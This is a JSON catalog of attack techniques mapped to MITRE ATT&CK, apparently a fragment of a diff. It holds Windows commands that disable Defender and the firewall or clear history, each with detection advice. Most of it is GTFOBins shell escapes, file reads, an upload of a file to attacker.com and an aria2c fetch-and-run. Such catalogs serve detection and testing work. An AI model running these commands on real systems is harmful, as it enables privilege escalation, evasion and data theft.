drift."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/powershell/module/defender/add-mppreference"],"added":true,"verifyNote":"MERGED from three near-duplicate Add-MpPreference exclusion entries (same toolId + same command intent — adding a Defender AV exclusion, all T1562.001). MS Learn confirms -ExclusionPath ('disables Windows Defender scheduled and real-time scanning for files in this folder'), -ExclusionProcess ('excludes any files opened by the processes that you specify'), and -ExclusionExtension ('exclude from scheduled, custom, and real-time scanning'); the three write to the Exclusions Paths/Processes/Extensions registry subkeys respectively. Technique mapping unchanged."},{"id":"daemon:powershell:40","toolId":"daemon:powershell","toolName":"Set-MpPreference","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify Tools"],"command":"Set-MpPreference -DisableRealtimeMonitoring $true","description":"The Defender module's Set-MpPreference cmdlet with -DisableRealtimeMonitoring $true turns off Microsoft Defender Antivirus real-time protection, stopping on-access scanning of files and processes host-wide.","usecase":"Disable real-time protection so subsequent malicious files execute without being scanned or quarantined.","mitre":["T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Defender Operational Event ID 5001 (real-time protection disabled) and 5007/5010. Capture 'Set-MpPreference -DisableRealtimeMonitoring' and related '-Disable*' toggles via Script Block Logging (4104). Enable Tamper Protection, which blocks this change and logs the attempt."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference"],"added":true,"verifyNote":"MS Learn confirms Set-MpPreference -DisableRealtimeMonitoring (Boolean) governs real-time protection; Defender Operational Event ID 5001 (real-time protection disabled) / 5007 (config changed) confirmed via Microsoft community/Sentinel guidance; ATT&CK T1562.001. No change."},{"id":"daemon:reg:41","toolId":"daemon:reg","toolName":"reg.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Modify Registry"],"command":"reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f","description":"The built-in reg.exe writes the legacy DisableAntiSpyware policy value to turn off Microsoft Defender Antivirus via the registry. Modern Windows blocks or ignores this value under Tamper Protection, but the write attempt itself is a well-known evasion indicator.","usecase":"Attempt to disable Defender through a policy registry key rather than the Defender cmdlets.","mitre":["T1562.001","T1112"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor registry writes to HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware (Sysmon 13) and process creation for reg.exe targeting that key. Tamper Protection generates Defender Event ID 5007 on the blocked attempt; treat any DisableAntiSpyware write as malicious on managed endpoints."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware"],"added":true,"verifyNote":"MS Learn DisableAntiSpyware doc confirms the value disables Defender AV and that it is now ignored/removed on modern Windows and protected by Tamper Protection (platform 4.18.2108.4+) - matching the entry's caveat; reg.exe add /v /t REG_DWORD /d /f is standard; ATT&CK T1562.001 + T1112. No change."},{"id":"daemon:netsh:42","toolId":"daemon:netsh","toolName":"netsh.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify System Firewall"],"command":"netsh advfirewall set allprofiles state off","description":"The built-in netsh advfirewall context sets the state of all Windows Defender Firewall profiles (Domain, Private, Public) to off, removing host-based network controls that would otherwise limit inbound/outbound activity.","usecase":"Turn off the host firewall to allow attacker tooling, C2, or lateral-movement traffic unimpeded.","mitre":["T1562.004"],"privilege":"admin","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for netsh.exe with 'advfirewall' and 'state off'. Alert on Windows Firewall Event ID 2003 (a firewall setting was changed) and 2009. Also watch sc.exe/net.exe targeting the MpsSvc service. Enforce firewall state centrally via GPO/Intune and alert on drift."}],"references":["https://attack.mitre.org/techniques/T1562/004/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh-advfirewall"],"added":true,"verifyNote":"MS Learn netsh-advfirewall doc confirms 'netsh advfirewall set [allprofiles|...] state <on|off|notconfigured>' where off 'Disables the firewall'; Windows Firewall Event ID 2003 (profile setting changed) confirmed; ATT&CK T1562.004. No change."},{"id":"daemon:byovd:43","toolId":"daemon:byovd","toolName":"BYOVD (vulnerable driver)","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion","Privilege Escalation"],"nativeCategory":["Impair Defenses","Bring Your Own Vulnerable Driver"],"command":"# BYOVD is documented here as a NAMED concept only. No exploitation steps are provided. Reference the LOLDrivers catalog for known-vulnerable signed drivers and the vendor blocklist for defensive coverage.","description":"Bring Your Own Vulnerable Driver (BYOVD) is a named, publicly-documented class of technique in which an adversary who already holds local administrator rights loads a legitimately signed but known-vulnerable kernel driver, then abuses that driver's flaw to gain kernel-mode code execution and disable or blind EDR/AV. This entry catalogs the concept and detection surface only; it contains no driver-exploitation procedure.","usecase":"Understand and detect kernel-level tampering where a signed vulnerable driver is used to kill or blind security tooling.","mitre":["T1068","T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor Sysmon Event ID 6 (driver loaded) and Security 4697/System 7045 (new kernel-mode service) for drivers matching LOLDrivers hashes/signatures or loading from user-writable paths. Enforce the Microsoft Vulnerable Driver Blocklist and WDAC/HVCI to block known-bad drivers. Alert on unexpected drivers signed by unrelated third parties on servers/workstations."}],"references":["https://attack.mitre.org/techniques/T1068/","https://www.loldrivers.io/"],"added":true,"verifyNote":"Concept-only (no exploit steps); LOLDrivers.io is the canonical public catalog of known-vulnerable signed drivers and ATT&CK T1068 (Exploitation for Priv-Esc) + T1562.001 map to BYOVD; Sysmon 6 / Security 4697 / System 7045 detection is accurate. No change."},{"id":"daemon:powershell:44","toolId":"daemon:powershell","toolName":"Clear-History","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Command History"],"command":"Clear-History; Remove-Item (Get-PSReadlineOption).HistorySavePath","description":"Clear-History flushes the current PowerShell session's in-memory history, while deleting the PSReadLine save path (ConsoleHost_history.txt) removes the persistent, cross-session command history; Set-PSReadLineOption -HistorySaveStyle SaveNothing disables future history writes. Together these hide the commands an operator ran.","usecase":"Erase both session and persistent PowerShell command history to conceal executed commands.","mitre":["T1070.003"],"privilege":"user","detection":[{"type":"Detection","value":"Capture Script Block Logging (4104) for 'Clear-History', 'Remove-Item ...HistorySavePath', '(Get-PSReadlineOption).HistorySavePath', and 'Set-PSReadLineOption -HistorySaveStyle SaveNothing'. Alert when ConsoleHost_history.txt is deleted, emptied, or truncated (file-audit / Sysmon 23 file-delete). Prefer transcript logging and central forwarding, which survive local history deletion."}],"references":["https://attack.mitre.org/techniques/T1070/003/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"],"added":true,"verifyNote":"MS Learn confirms Set-PSReadLineOption -HistorySaveStyle SaveNothing ('Don't use a history file') and HistorySavePath ($($Host.Name)_history.txt, e.g. ConsoleHost_history.txt); Clear-History is a built-in cmdlet; Atomic Red Team T1070.003 documents the technique (also corroborated by Black Hills InfoSec write-up); ATT&CK T1070.003. No change."}] -\ No newline at end of file +[{"id":"gtfo:7z:file-read:0:sudo","toolId":"gtfo:7z","toolName":"7z","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/7z/"]},{"id":"gtfo:7z:file-read:0:unprivileged","toolId":"gtfo:7z","toolName":"7z","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/7z/"]},{"id":"gtfo:R:shell:0:sudo","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/R/"]},{"id":"gtfo:R:shell:0:suid","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/R/"]},{"id":"gtfo:R:shell:0:unprivileged","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/R/"]},{"id":"gtfo:aa-exec:shell:0:sudo","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aa-exec/"]},{"id":"gtfo:aa-exec:shell:0:suid","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aa-exec/"]},{"id":"gtfo:aa-exec:shell:0:unprivileged","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aa-exec/"]},{"id":"gtfo:ab:download:0:sudo","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:download:0:suid","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:download:0:unprivileged","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:upload:0:sudo","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:upload:0:suid","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:upload:0:unprivileged","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:acr:command:0:sudo","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/acr/"]},{"id":"gtfo:acr:command:0:suid","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/acr/"]},{"id":"gtfo:acr:command:0:unprivileged","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/acr/"]},{"id":"gtfo:agetty:shell:0:suid","toolId":"gtfo:agetty","toolName":"agetty","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"agetty -l /bin/sh -o -p -a root tty","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/agetty/"]},{"id":"gtfo:alpine:file-read:0:sudo","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/alpine/"]},{"id":"gtfo:alpine:file-read:0:suid","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/alpine/"]},{"id":"gtfo:alpine:file-read:0:unprivileged","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/alpine/"]},{"id":"gtfo:ansible-playbook:shell:0:sudo","toolId":"gtfo:ansible-playbook","toolName":"ansible-playbook","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file\nansible-playbook /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"]},{"id":"gtfo:ansible-playbook:shell:0:unprivileged","toolId":"gtfo:ansible-playbook","toolName":"ansible-playbook","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file\nansible-playbook /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"]},{"id":"gtfo:ansible-test:shell:0:sudo","toolId":"gtfo:ansible-test","toolName":"ansible-test","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ansible-test shell","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ansible-test/"]},{"id":"gtfo:ansible-test:shell:0:unprivileged","toolId":"gtfo:ansible-test","toolName":"ansible-test","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ansible-test shell","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ansible-test/"]},{"id":"gtfo:aoss:shell:0:sudo","toolId":"gtfo:aoss","toolName":"aoss","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aoss /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aoss/"]},{"id":"gtfo:aoss:shell:0:unprivileged","toolId":"gtfo:aoss","toolName":"aoss","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"aoss /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aoss/"]},{"id":"gtfo:apache2:file-read:0:sudo","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:0:suid","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:0:unprivileged","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:1:sudo","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:1:suid","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:1:unprivileged","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2ctl:file-read:0:sudo","toolId":"gtfo:apache2ctl","toolName":"apache2ctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2ctl -c 'Include /path/to/input-file'","description":"The first line only is likely leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2ctl/"]},{"id":"gtfo:apache2ctl:file-read:0:unprivileged","toolId":"gtfo:apache2ctl","toolName":"apache2ctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2ctl -c 'Include /path/to/input-file'","description":"The first line only is likely leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2ctl/"]},{"id":"gtfo:apport-cli:inherit:0:unprivileged","toolId":"gtfo:apport-cli","toolName":"apport-cli","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"apport-cli -f\n1\n2\nv","description":"The terminal interface expects some choices in order to spawn tha pager.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apport-cli/"]},{"id":"gtfo:apt-get:inherit:0:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"apt-get changelog apt","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:inherit:0:unprivileged","toolId":"gtfo:apt-get","toolName":"apt-get","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"apt-get changelog apt","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:0:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' >/path/to/temp-file\napt-get -y install -c /path/to/temp-file sl","description":"For this to work the target package (i.e., `sl`) must not be already installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:0:suid","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' >/path/to/temp-file\napt-get -y install -c /path/to/temp-file sl","description":"For this to work the target package (i.e., `sl`) must not be already installed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:1:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"apt-get update -o APT::Update::Pre-Invoke::=/bin/sh","description":"When the shell exits the `update` command is actually executed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:1:suid","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"apt-get update -o APT::Update::Pre-Invoke::=/bin/sh","description":"When the shell exits the `update` command is actually executed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:aptitude:inherit:0:sudo","toolId":"gtfo:aptitude","toolName":"aptitude","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"aptitude changelog aptitude","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aptitude/"]},{"id":"gtfo:aptitude:inherit:0:unprivileged","toolId":"gtfo:aptitude","toolName":"aptitude","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"aptitude changelog aptitude","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aptitude/"]},{"id":"gtfo:ar:file-read:0:sudo","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ar/"]},{"id":"gtfo:ar:file-read:0:suid","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ar/"]},{"id":"gtfo:ar:file-read:0:unprivileged","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ar/"]},{"id":"gtfo:arch-nspawn:shell:0:sudo","toolId":"gtfo:arch-nspawn","toolName":"arch-nspawn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mkdir -p ./etc/\ngrep -oP \"^CHROOT_VERSION='\\K[^']+\" /usr/share/devtools/lib/archroot.sh >.arch-chroot\ntouch ./etc/pacman.conf\necho 'CARCH=true;/bin/sh;exit' >etc/makepkg.conf\narch-nspawn .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arch-nspawn/"]},{"id":"gtfo:aria2c:command:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:1:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:1:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same 